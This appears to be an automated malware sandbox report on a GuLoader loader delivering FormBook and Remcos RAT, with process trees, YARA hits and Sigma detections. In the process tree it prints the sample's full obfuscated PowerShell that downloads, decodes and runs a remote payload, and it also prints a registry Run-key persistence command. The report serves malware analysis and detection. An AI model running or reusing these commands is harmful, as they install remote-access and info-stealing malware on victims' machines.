Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 2580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • cmd.exe (PID: 6896 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • powershell.exe (PID: 6420 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                • cmd.exe (PID: 5144 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • wab.exe (PID: 5276 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                • wab.exe (PID: 3640 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
                  • sofUaEnRVTAexkDmTx.exe (PID: 6828 cmdline: "C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                    • clip.exe (PID: 5896 cmdline: "C:\Windows\SysWOW64\clip.exe" MD5: E40CB198EBCD20CD16739F670D4D7B74)
                      • sofUaEnRVTAexkDmTx.exe (PID: 6928 cmdline: "C:\Program Files (x86)\NiybMphLYFHPwoLOWAIibdSEdhjCFnQTBUPYzglFSMsilqALhpawWUAHgChxZUrfiymPYgJzyMKJ\sofUaEnRVTAexkDmTx.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
                      • firefox.exe (PID: 2264 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • dllhost.exe (PID: 7140 cmdline: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
  • wab.exe (PID: 6956 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • rundll32.exe (PID: 7116 cmdline: C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding MD5: EF3179D498793BF4234F708D3BE28633)
  • wab.exe (PID: 4788 cmdline: "C:\Program Files (x86)\windows mail\wab.exe" MD5: 251E51E2FEDCE8BB82763D39D631EF89)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Roaming\jiourhjs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000006.00000002.2508655115.00000000085D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
      0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        0000001E.00000002.3417567901.0000000000EF0000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
        • 0x345fd:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
        • 0x1db9c:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
        0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          0000001B.00000002.3098127241.0000000003000000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2a540:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x13adf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          Click to see the 28 entries
          SourceRuleDescriptionAuthorStrings
          amsi64_2084.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            amsi32_4972.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
            • 0xe1f8:$b2: ::FromBase64String(
            • 0xd2c5:$s1: -join
            • 0x6a71:$s4: +=
            • 0x6b33:$s4: +=
            • 0xad5a:$s4: +=
            • 0xce77:$s4: +=
            • 0xd161:$s4: +=
            • 0xd2a7:$s4: +=
            • 0x175ce:$s4: +=
            • 0x1764e:$s4: +=
            • 0x17714:$s4: +=
            • 0x17794:$s4: +=
            • 0x1796a:$s4: +=
            • 0x179ee:$s4: +=
            • 0xdaa0:$e4: Get-WmiObject
            • 0xdc8f:$e4: Get-Process
            • 0xdce7:$e4: Start-Process
            • 0x160ea:$e4: Get-Process
            amsi32_504.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi32_6420.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xaa35:$b2: ::FromBase64String(
              • 0x9ae8:$s1: -join
              • 0x3294:$s4: +=
              • 0x3356:$s4: +=
              • 0x757d:$s4: +=
              • 0x969a:$s4: +=
              • 0x9984:$s4: +=
              • 0x9aca:$s4: +=
              • 0x13b9a:$s4: +=
              • 0x13c1a:$s4: +=
              • 0x13ce0:$s4: +=
              • 0x13d60:$s4: +=
              • 0x13f36:$s4: +=
              • 0x13fba:$s4: +=
              • 0xa2cc:$e4: Get-WmiObject
              • 0xa4bb:$e4: Get-Process
              • 0xa513:$e4: Start-Process
              • 0x126b4:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ProcessId: 6548, ProcessName: cmd.exe
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Argumentlistens
              Source: Process startedAuthor: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6548, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ProcessId: 5028, ProcessName: reg.exe
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Argumentlistens" /t REG_EXPAND_SZ /d "%Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes)", ProcessId: 6548, ProcessName: cmd.exe
              Source: Registry Key setAuthor: frack113, Florian Roth (Nextron Systems): Data: Details: %Semicomic% -w 1 $Affektationernes=(Get-ItemProperty -Path 'HKCU:\Agenetic76\').Tautologiske178;%Semicomic% ($Affektationernes), EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 5028, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Argumentlistens
              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files (x86)\windows mail\wab.exe", ParentImage: C:\Program Files (x86)\Windows Mail\wab.exe, ParentProcessId: 7108, ParentProcessName: wab.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IMG-466573885783553Folketingsmedlemmers.vbs" , ProcessId: 2144, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Antigyrous='S';$Antigyrous+='ubs';$Antigyrous+='tri';$Disseizure = 1;$Antigyrous+='ng';Function Sortkridtstegningens($Udlossende){$Makah=$Udlossende.Length-$Disseizure;For($Vaesentligheden206=5;$Vaesentligheden206 -lt $Makah;$Vaesentligheden206+=6){$Vrdiomraades+=$Udlossende.$Antigyrous.Invoke( $Vaesentligheden206, $Disseizure);}$Vrdiomraades;}function Caprellidae($Kondenseret){ & ($Fligene) ($Kondenseret);}$festdragtens=Sortkridtstegningens ' S.ovMFo,kloBeathzBelavi overlFaciolVictraMictu/Kphje5Krlha.Osteo0 Prin Sove( TiltWLnfreiNa.osnTeg sdWatero,etatwVaskosRegis TrouNswigsTinges Retsa1Intel0 Aspe. Anal0 C oc;P.aya disshWDoliciLa gbnF,ktu6Trska4 g.nz;an ui OmkamxH tto6Forha4 Fine;Hvidg Ring rFlaskvBakka: Uden1Pyroc2 Unmo1Anili.Stil.0 T,ks) dy.t AendrG GuldeWavescIc,erkAdonio 